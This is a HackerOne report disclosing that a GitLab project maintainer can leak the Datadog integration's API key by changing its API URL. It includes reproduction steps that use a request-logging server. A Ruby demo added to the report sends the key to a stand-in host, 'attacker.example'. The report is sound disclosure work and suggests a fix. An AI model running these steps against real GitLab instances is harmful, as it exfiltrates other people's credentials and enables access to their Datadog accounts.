Maintainer can leak Datadog API key by changing integration URL
HackerOne report #1724402 by ryotak
on 2022-10-06, assigned to @cmaxim:
Report
Summary
Because the fixes for CVE-2022-2497 and CVE-2022-2882 were incomplete, a malicious maintainer can still leak the Datadog API key by changing the integration's API URL.
Description
In the patch for CVE-2022-2882, some fields of the GitHub integration model were modified, and exposes_secrets: true was added to the repository_url field.
This option causes the integration's secrets to be reset whenever the field is updated, which makes exfiltrating access tokens by redirecting the integration impossible.
ee/app/models/integrations/github.rb
line 22-26
field :repository_url,
  title: -> { s_('GithubIntegration|Repository URL') },
  required: true,
  exposes_secrets: true,
  placeholder: 'https://github.com/owner/repository'
However, some models are still missing the exposes_secrets option.
While most of these models reset their secrets with their own callback (e.g. before_validation :reset_password in the Jenkins model), there is one exception: Datadog.
app/models/integrations/jenkins.rb
line 30-44
before_validation :reset_password
[...]
def reset_password
  # don't reset the password if a new one is provided
  if (jenkins_url_changed? || username.blank?) && !password_touched?
    self.password = nil
  end
end
In the Datadog model, api_url is neither marked exposes_secrets nor covered by a reset callback; the only validation on it is a URL format check. The stored API key therefore survives a URL change, which allows a malicious maintainer to leak it by pointing the integration at a server they control.
app/models/integrations/datadog.rb
line 25
validates :api_url, public_url: { allow_blank: true }
Steps to reproduce
(These steps assume that you're using gitlab.com. If you're using a self-hosted instance, you may need to set up a GitLab Runner.)
- Prepare 2 GitLab accounts. (Called account A and account B below.)
- Create a project with account A and push some content to the repository.
- In Settings -> Integrations -> Datadog, enable the Datadog integration and enter a new API key. (This API key can be a random string.)
- In Project information -> Members, invite account B with the Maintainer role.
- Log in to account B and open the project created in step 2.
- In Settings -> Integrations -> Datadog, set the API URL to a server whose request log you can read. (I'd recommend https://requestbin.com/ if you need a server.)
- Click Test settings.
- Confirm that the Datadog API key is sent to the server.
If you have any troubles with these steps to reproduce, please check the video attached to this report.
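The mechanism described above (a URL field that lacks exposes_secrets keeps the stored secret, and "Test settings" then sends that secret to whatever URL a maintainer enters) and the reproduction steps, condensed into a runnable model. This is an added example and not GitLab's code: MiniIntegration is a stand-in for the Integration base class and ActiveRecord dirty tracking, the is_secret: option, update!, test_request, maintainer_repoints_url and the key/URL values are all constructed for the demo, and the reset rule follows the Jenkins reset_password logic quoted above (wipe the secret on a URL change unless a fresh secret was supplied in the same update).

```ruby
# Added example (not GitLab's code): a minimal stand-in for the Integration
# `field` DSL and ActiveRecord dirty tracking, showing why a URL field that
# lacks exposes_secrets: true lets a maintainer redirect the stored secret.
# MiniIntegration, is_secret:, update!, test_request and all key/URL values
# are constructed for this demo.
class MiniIntegration
  def self.fields
    @fields ||= {}
  end

  # `field name, options` like GitLab's DSL; only :exposes_secrets and
  # :is_secret (assumed here to mark the secret field) are modelled.
  def self.field(name, **opts)
    fields[name] = opts
    define_method(name) { @attrs[name] }
    define_method("#{name}=") { |value| @attrs[name] = value }
    define_method("#{name}_changed?") { @attrs[name] != @saved[name] }
  end

  def initialize(**attrs)
    @attrs = {}
    @saved = {}
    update!(**attrs)
  end

  # Before save: if any field marked exposes_secrets changed, clear every
  # secret field unless a fresh value for it was supplied in the same update
  # (the rule the Jenkins model's reset_password implements by hand).
  def reset_secret_fields
    exposing = self.class.fields.select { |_, o| o[:exposes_secrets] }.keys
    return unless exposing.any? { |name| public_send("#{name}_changed?") }

    self.class.fields.each do |name, opts|
      next unless opts[:is_secret]
      next if public_send("#{name}_changed?") # new secret provided, keep it

      @attrs[name] = nil
    end
  end

  def update!(**attrs)
    attrs.each { |name, value| public_send("#{name}=", value) }
    reset_secret_fields
    @saved = @attrs.dup
    self
  end

  # What "Test settings" would send: a request to api_url carrying api_key.
  def test_request
    { url: api_url, headers: { 'DD-API-KEY' => api_key } }
  end
end

# Before the fix: api_url is a plain field, as in the Datadog model today.
class VulnerableDatadog < MiniIntegration
  field :api_url
  field :api_key, is_secret: true
end

# Suggested fix: api_url marked exposes_secrets: true.
class FixedDatadog < MiniIntegration
  field :api_url, exposes_secrets: true
  field :api_key, is_secret: true
end

# Owner configures the integration (constructed values), then a Maintainer
# repoints the URL at a server they control and clicks "Test settings".
# Returns the outgoing request so the caller can see what the key field holds.
def maintainer_repoints_url(klass)
  integration = klass.new(api_url: 'https://api.datadoghq.com',
                          api_key: 'dd-secret-123')
  integration.update!(api_url: 'https://attacker.example/collect')
  integration.test_request
end

if __FILE__ == $PROGRAM_NAME
  p maintainer_repoints_url(VulnerableDatadog) # key still present
  p maintainer_repoints_url(FixedDatadog)      # key reset to nil
end
```

With the vulnerable model the request to the attacker's URL still carries dd-secret-123; with the fixed model the key is nil, so a maintainer who changes the URL has to supply their own key and gains nothing. Rotating the key and the URL in one update keeps the new key, matching the "don't reset the password if a new one is provided" comment in the Jenkins model.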
Examples
Example repository that demonstrates the vulnerability: https://gitlab.com/Ry0taK/maintainer-integration-leak
As this repository is private, please let me know if you need to access this repository.
What is the current bug behavior?
The API key stored for the Datadog integration remains in place even after the API URL is changed.
What is the expected correct behavior?
The API key stored for the Datadog integration should be cleared once the API URL is changed.
Suggested fix
Add exposes_secrets: true to the api_url field of the Datadog integration model.
Relevant logs and/or screenshots
Output of checks
Results of GitLab environment info
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version: 2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version: 6.4.2
Go Version: unknown
GitLab information
Version: 15.4.1-ee
Revision: 7b2ed8f038f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: https://gl.ryotak.me
HTTP Clone URL: https://gl.ryotak.me/some-group/some-project.git
SSH Clone URL: git@gl.ryotak.me:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
A malicious maintainer can leak the Datadog API key and use it to modify or exfiltrate information in the victim's Datadog account.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: